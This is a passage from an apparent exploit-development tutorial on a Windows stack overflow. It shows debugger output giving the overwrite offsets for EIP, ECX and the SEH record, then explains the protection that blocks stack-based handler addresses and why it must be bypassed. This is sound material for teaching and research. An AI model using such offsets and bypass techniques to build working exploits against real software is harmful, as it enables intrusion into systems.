    -  Stack pivot between 1192 & 1836 bytes needed to land in this pattern
[+] Examining registers
    EIP contains normal pattern : 0x74413973 (offset 568)
    ECX contains normal pattern : 0x74413973 (offset 568)
[+] Examining SEH chain
    SEH record (nseh field) at 0x0012ffb0 overwritten with normal pattern : 0x41387341 (offset 564), followed by 72 bytes o
Apparently all we would have to do is put the buffer address into the handler field at offset 568 (right after the nseh field at offset 564) and we're done. But because this technique was so heavily abused, Microsoft inserted a sanity check that prohibits the structured exception handling mechanism from treating stack addresses as valid handler addresses. In order to bypass it we must understand how the exception chain is used.